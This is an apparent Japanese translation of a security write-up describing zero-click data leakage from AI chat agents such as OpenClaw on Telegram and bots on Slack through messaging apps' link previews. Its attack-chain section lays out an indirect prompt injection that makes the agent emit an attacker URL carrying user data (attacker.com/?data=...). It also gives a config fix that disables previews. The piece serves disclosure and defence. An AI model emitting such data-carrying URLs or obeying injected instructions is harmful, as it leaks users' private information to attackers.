
2026/02/10 5:21
メッセージングアプリ内にあるエージェントからのデータ漏洩(外部転送)
RSS: https://news.ycombinator.com/rss
要約▶
Japanese Translation:
改訂要約
この記事では、Telegram 上の OpenClaw や Slack、Telegram などで使用される他のボットといった AI チャットエージェントが、メッセージングアプリの「リンクプレビュー」機能を悪用してユーザー情報をクリックさえせずに外部へ流出できる方法を説明しています。リンクプレビューが有効になると、アプリは自動的に URL のメタデータを取得します。攻撃者が間接プロンプトインジェクションで LLM を誘導し、機密情報をクエリ文字列に含む悪意のある URL を出力させると、その結果生じたプレビュー要求は攻撃者側サーバーのログにそのデータを漏らします。著者は複数のエージェント・アプリ組み合わせでこの攻撃を実演し、リンクプレビューを単純に無効化するだけで脆弱性が排除できることを示しています。具体的な構成修正として、OpenClaw の JSON ファイル内
channels > telegram セクションの linkPreview: false を設定する方法を提供し、特定の組み合わせが安全かどうか確認するテストも提示しています。その結果は AITextRisk.com 上で可視化されています。Slackbot、Telegram bot など一般的なスクレイパーボットが最も頻繁にプレビュー要求を生成することを示すグラフも掲載されています。本稿では、メッセージングプラットフォームに対しリンクプレビュー設定を開発者へ公開させるよう求め、エージェント作成者にはその設定を尊重するか、ユーザーに明示的な選択肢を提供してもらうことで、将来のデータ流出事案を減少させ、AI ボットをチャット環境で導入する企業に対するプライバシー/コンプライアンスリスクを軽減できると主張しています。本文
脅威インテリジェンス
Slack や Telegram などのメッセージングアプリを通じて AI エージェント(例:OpenClaw)と通信するケースが増えています。
しかし、これらのプラットフォームは「リンクプレビュー」をサポートしているため、実質的に認識されていない LLM 専用データ漏洩リスク をユーザーに与えてしまいます。リンクプレビューを有効にすると、AI が生成したメッセージ内の悪意あるリンクを受信した瞬間に自動でユーザーデータが外部へ送られます(プレビュー無しの場合は通常、ユーザーがリンクをクリックする必要があります)。
例
OpenClaw は Telegram 経由でデフォルトで露出します。
以下の任意のエージェント/通信アプリ組み合わせを試してください!
LLM ベースのアプリから間接プロンプトインジェクションを使ってデータを漏洩させる基本的な手法は、モデルに対して攻撃者が制御するリンクを出力させ、その URL に機密ユーザーデータを付与させることです。リンクがクリックされればデータが盗まれます。Telegram や Slack などのアプリ経由で AI エージェントに問い合わせると、ユーザーは知らずにより深刻な攻撃を許可してしまいます。
これらのアプリはメッセージ内のリンクに対し「プレビュー」をサポートしています。リンクプレビューはリンクをクリックしたのと同じネットワークリクエストを行うため、ユーザーがクリックする必要はありません。
従って、リンクプレビュー機能付きのエージェントシステムでは、AI エージェントが応答するとすぐにデータ漏洩が発生する可能性があります。
攻撃チェーン
- URL プレビュー – メッセージング/コラボレーションアプリはメタデータ(サムネイル、タイトル、説明)を表示するため URL プレビューを提供します。
- 間接プロンプトインジェクション – LLM を騙して応答に悪意ある URL を含めさせます。
- 悪意ある URL の構築
attacker.com/?data={AI_APPENDS_SENSITIVE_DATA_HERE} - プレビューリクエスト – リンクがプレビューされると、
にメタデータ取得のためにリクエストが送られます。クエリパラメータに機密情報が含まれています。attacker.com - データ漏洩 – 攻撃者は自サーバーのログを読み取り、URL に埋め込まれたユーザーデータを取得します。
セキュアな OpenClaw Telegram 設定
OpenClaw を Telegram 経由で利用するユーザーは、リンクプレビューを明示的に無効化できます:
を編集。~/.openclaw/openclaw.json- 以下を追加:
{ "channels": { "telegram": { "linkPreview": false } } } - 実験を再度実行すると、データは AITextRisk.com に送信されなくなります。
テスト結果
AITextRisk.com で、あなたのエージェントシステムがサイトのプレビューを作成したかどうか、そしてどのデータがプレビューリクエスト経由で送られたかを確認できます。
またサイトでは以下も表示されます:
- URL プレビューに最も頻繁に使用されたスクレイパー(例:Slackbot、Telegram bot)のグラフ。
- どのエージェント/アプリ組み合わせがリスクが高いかのレポート。
- 不安全なプレビューを作成しないシステムへの発見提出機能。
要点
多くのエージェントシステムがさまざまなアプリに統合されています。
以下に対して重要です:
- 通信アプリ開発者 – 開発者向けにリンクプレビュー設定を公開、あるいはチャット/チャンネル単位でユーザーが無効化できるようにすること。
- エージェント開発者 – これらの設定を活用(またはエンドユーザーへ選択肢を提供)する。
将来的には、エージェントシステムとそれが統合されるインターフェース双方で対策がサポートされる環境が実現できればと願っています。